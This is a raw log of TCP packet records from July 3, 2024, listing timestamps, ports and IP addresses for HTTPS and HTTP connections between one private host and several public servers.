Jul 3, 2024 21:20:04.037404060 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.045056105 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.045125961 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.045134068 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.077533007 CEST	49740	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:04.077554941 CEST	443	49740	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.078418016 CEST	49739	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:04.078464985 CEST	443	49739	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.099998951 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.112060070 CEST	49743	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:04.112102032 CEST	443	49743	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.112163067 CEST	49743	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:04.113235950 CEST	49743	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:04.113248110 CEST	443	49743	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.119627953 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.119684935 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.119736910 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.119752884 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.119870901 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.119908094 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.119934082 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.119944096 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.119990110 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.120434046 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.120492935 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.120589972 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.120629072 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.120640993 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.120873928 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.121057987 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.121124983 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.121167898 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.121175051 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.121284008 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.121316910 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.121330023 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.121336937 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.121377945 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.121385098 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.121417999 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.121534109 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.122467995 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.122545958 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.122612000 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.122621059 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.122637033 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.122694969 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.122704029 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.122874975 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.122961998 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.122967958 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.123287916 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.123331070 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.123378038 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.123393059 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.123400927 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.123434067 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.125694990 CEST	49736	443	192.168.2.4	104.17.24.14
Jul 3, 2024 21:20:04.125708103 CEST	443	49736	104.17.24.14	192.168.2.4
Jul 3, 2024 21:20:04.131045103 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.131139040 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.131146908 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.131182909 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.131279945 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.131288052 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.131407976 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.131474972 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.131483078 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.131544113 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.131659031 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.131666899 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.132178068 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.132236958 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.132272005 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.132277012 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.132283926 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.132329941 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.184741020 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.184760094 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.217829943 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.217843056 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.217874050 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.217886925 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.217896938 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.217911005 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.217930079 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.217957020 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.217974901 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.217991114 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.219582081 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.219613075 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.219621897 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.219639063 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.219664097 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.219671011 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.219722033 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.226073027 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.226133108 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.226141930 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.226154089 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.226197958 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.439519882 CEST	443	49741	216.58.206.68	192.168.2.4
Jul 3, 2024 21:20:04.480767012 CEST	49741	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:20:04.648253918 CEST	49741	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:20:04.648272991 CEST	443	49741	216.58.206.68	192.168.2.4
Jul 3, 2024 21:20:04.649609089 CEST	443	49741	216.58.206.68	192.168.2.4
Jul 3, 2024 21:20:04.649678946 CEST	49741	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:20:04.657615900 CEST	49738	443	192.168.2.4	151.101.130.137
Jul 3, 2024 21:20:04.657646894 CEST	443	49738	151.101.130.137	192.168.2.4
Jul 3, 2024 21:20:04.659133911 CEST	49741	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:20:04.659208059 CEST	443	49741	216.58.206.68	192.168.2.4
Jul 3, 2024 21:20:04.702640057 CEST	49741	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:20:04.702652931 CEST	443	49741	216.58.206.68	192.168.2.4
Jul 3, 2024 21:20:04.747781992 CEST	49741	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:20:04.769336939 CEST	443	49743	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.788311958 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:04.788352013 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:04.788506985 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:04.788892984 CEST	49743	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:04.788903952 CEST	443	49743	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.789333105 CEST	443	49743	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.789486885 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:04.789511919 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:04.789851904 CEST	49743	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:04.789928913 CEST	443	49743	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.790153980 CEST	49743	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:04.836497068 CEST	443	49743	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.899928093 CEST	443	49743	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.899947882 CEST	443	49743	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.900022030 CEST	49743	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:04.900037050 CEST	443	49743	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.900074959 CEST	443	49743	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:04.900111914 CEST	49743	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:04.902004957 CEST	49743	443	192.168.2.4	13.107.246.60
Jul 3, 2024 21:20:04.902025938 CEST	443	49743	13.107.246.60	192.168.2.4
Jul 3, 2024 21:20:05.250454903 CEST	49745	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:05.250484943 CEST	443	49745	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:05.250555038 CEST	49745	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:05.252248049 CEST	49745	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:05.252264023 CEST	443	49745	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:05.278182030 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.278444052 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.278467894 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.278836966 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.279340029 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.279409885 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.279723883 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.324501038 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.488125086 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.488162041 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.488234043 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.488259077 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.528831959 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.577593088 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.577608109 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.577686071 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.577981949 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.578057051 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.578072071 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.579366922 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.579444885 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.579457045 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.580506086 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.580549002 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.580565929 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.580576897 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.580770016 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.663971901 CEST	49746	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:05.664007902 CEST	443	49746	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:05.664077997 CEST	49746	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:05.664614916 CEST	49747	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:05.664654970 CEST	443	49747	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:05.664735079 CEST	49747	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:05.665487051 CEST	49748	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:05.665496111 CEST	443	49748	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:05.665559053 CEST	49748	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:05.666524887 CEST	49747	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:05.666538954 CEST	443	49747	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:05.667844057 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.667911053 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.667926073 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.668562889 CEST	49746	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:05.668579102 CEST	443	49746	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:05.668689013 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.668730974 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.668746948 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.668761015 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.668808937 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.668999910 CEST	49748	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:05.669011116 CEST	443	49748	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:05.669717073 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.669740915 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.669795036 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.669802904 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.669815063 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.669837952 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.669845104 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.670090914 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.670600891 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.670670986 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.670677900 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.670690060 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.670743942 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.671804905 CEST	49744	443	192.168.2.4	44.197.227.46
Jul 3, 2024 21:20:05.671814919 CEST	443	49744	44.197.227.46	192.168.2.4
Jul 3, 2024 21:20:05.923712969 CEST	443	49745	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:05.923896074 CEST	49745	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:05.935082912 CEST	49745	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:05.935097933 CEST	443	49745	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:05.935405016 CEST	443	49745	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:05.976138115 CEST	49745	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:06.337939024 CEST	443	49747	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.341408014 CEST	443	49746	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.359999895 CEST	49747	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.360028982 CEST	443	49747	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.361640930 CEST	49746	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.361656904 CEST	443	49746	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.362903118 CEST	443	49746	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.362971067 CEST	49746	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.363856077 CEST	443	49748	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.363919973 CEST	443	49747	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.363991976 CEST	49747	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.413311005 CEST	49748	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.446856976 CEST	49746	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.446979046 CEST	443	49746	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.447216034 CEST	49747	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.447371006 CEST	49748	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.447377920 CEST	443	49748	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.447488070 CEST	443	49747	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.447684050 CEST	49746	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.447695017 CEST	443	49746	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.447782040 CEST	49747	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.447797060 CEST	443	49747	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.448523045 CEST	443	49748	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.448590040 CEST	49748	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.448980093 CEST	49748	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.449069023 CEST	443	49748	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.449203014 CEST	49748	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.449209929 CEST	443	49748	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.479212999 CEST	49745	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:06.489440918 CEST	49746	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.489461899 CEST	49747	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.489476919 CEST	49748	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.524501085 CEST	443	49745	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:06.548860073 CEST	443	49747	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.549047947 CEST	443	49747	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.549108982 CEST	49747	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.549712896 CEST	443	49746	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.549849033 CEST	49747	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.549869061 CEST	443	49747	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.550049067 CEST	443	49746	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.550103903 CEST	49746	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.551422119 CEST	49746	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.551436901 CEST	443	49746	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.641133070 CEST	443	49748	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.641155958 CEST	443	49748	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.641236067 CEST	49748	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.641251087 CEST	443	49748	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.641283035 CEST	443	49748	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.641450882 CEST	49748	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.643177032 CEST	49748	443	192.168.2.4	13.107.246.44
Jul 3, 2024 21:20:06.643194914 CEST	443	49748	13.107.246.44	192.168.2.4
Jul 3, 2024 21:20:06.670207977 CEST	443	49745	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:06.670371056 CEST	443	49745	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:06.670423985 CEST	49745	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:06.670553923 CEST	49745	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:06.670568943 CEST	443	49745	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:06.670579910 CEST	49745	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:06.670586109 CEST	443	49745	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:06.730761051 CEST	49752	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:06.730779886 CEST	443	49752	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:06.730859995 CEST	49752	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:06.731272936 CEST	49752	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:06.731285095 CEST	443	49752	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:07.384413958 CEST	443	49752	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:07.384536028 CEST	49752	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:07.413060904 CEST	49752	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:07.413079977 CEST	443	49752	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:07.413330078 CEST	443	49752	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:07.415162086 CEST	49752	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:07.456509113 CEST	443	49752	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:07.664577961 CEST	443	49752	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:07.664634943 CEST	443	49752	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:07.664714098 CEST	49752	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:07.665962934 CEST	49752	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:07.665962934 CEST	49752	443	192.168.2.4	184.28.90.27
Jul 3, 2024 21:20:07.665982962 CEST	443	49752	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:07.665992022 CEST	443	49752	184.28.90.27	192.168.2.4
Jul 3, 2024 21:20:11.979661942 CEST	49754	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:11.979722977 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:11.979795933 CEST	49754	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:11.982088089 CEST	49754	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:11.982120037 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:12.697098017 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:12.697206974 CEST	49754	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:12.702636003 CEST	49754	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:12.702649117 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:12.702918053 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:12.754798889 CEST	49754	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:13.517333984 CEST	49754	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:13.564502954 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:13.753575087 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:13.753602028 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:13.753609896 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:13.753648043 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:13.753671885 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:13.753678083 CEST	49754	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:13.753683090 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:13.753712893 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:13.753747940 CEST	49754	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:13.753770113 CEST	49754	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:13.753957987 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:13.754033089 CEST	49754	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:13.754040956 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:13.754581928 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:13.754687071 CEST	49754	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:14.363666058 CEST	443	49741	216.58.206.68	192.168.2.4
Jul 3, 2024 21:20:14.363723040 CEST	443	49741	216.58.206.68	192.168.2.4
Jul 3, 2024 21:20:14.363936901 CEST	49741	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:20:14.475709915 CEST	49754	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:14.475756884 CEST	443	49754	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:15.647563934 CEST	49741	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:20:15.647583961 CEST	443	49741	216.58.206.68	192.168.2.4
Jul 3, 2024 21:20:16.623137951 CEST	80	49723	217.20.57.24	192.168.2.4
Jul 3, 2024 21:20:16.623300076 CEST	49723	80	192.168.2.4	217.20.57.24
Jul 3, 2024 21:20:16.623416901 CEST	49723	80	192.168.2.4	217.20.57.24
Jul 3, 2024 21:20:16.628215075 CEST	80	49723	217.20.57.24	192.168.2.4
Jul 3, 2024 21:20:21.682996988 CEST	49767	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:21.683033943 CEST	443	49767	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:21.683089972 CEST	49767	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:21.683506966 CEST	49767	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:21.683520079 CEST	443	49767	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:22.391625881 CEST	443	49767	185.244.151.84	192.168.2.4
